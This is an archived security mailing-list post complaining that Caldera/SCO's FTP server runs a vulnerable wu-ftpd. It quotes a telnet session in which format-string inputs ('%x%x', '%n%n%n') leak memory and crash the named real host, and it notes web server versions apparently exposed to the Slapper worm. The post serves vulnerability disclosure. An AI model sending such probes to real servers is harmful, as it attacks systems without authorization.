[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <3F424E5D.3030902@snosoft.com>
From: dotslash at snosoft.com (KF)
Subject: SCO Web Site Vulnerable to Slapper?
**** CALERA ARE YOU PAYING ATTENTION **** WAKE UP ****
(normally I would not do this...) I am under the impression that either
they probably don't care about their secuirty or they are ignorant... I
reported this (see below) to them SEVERAL times... they use a vulnerable
version of their own ftpd on their ftp server... can you say trojaned
distribution site? They probably have not patched it because no one has
produced a public exploit... they DO have a patch available however.
> telnet ftpput.caldera.com 21
> Trying 216.250.128.33...
> Connected to ftpput.caldera.com.
> Escape character is '^]'.
> 220 artemis FTP server (Version 2.1WU(1)) ready.
> user anonymous
> 331 Guest login ok, send e-mail address as password.
> pass err@
> 230-Welcome to Caldera's FTP Archive Site
> 230-
...
> 230 Guest login ok, access restrictions apply.
> site exec %x%x
> 200-d2
> 200 (end of '%x%x')
> site exec %n%n%n
> Connection closed by foreign host.
-KF
-------------------------------------------------
subject: [Full-Disclosure] SCO Web Site Vulnerable to Slapper?
integerdotonefourfivenine@...oo.com wrote:
They seem to be running Apache/1.3.14 (Unix)
mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC on Linux,
which, if I have my facts straight, is vulnerable to
<URL:http://www.cert.org/advisories/CA-2002-27.html>.
Am I correct?
Powered by blists - more mailing lists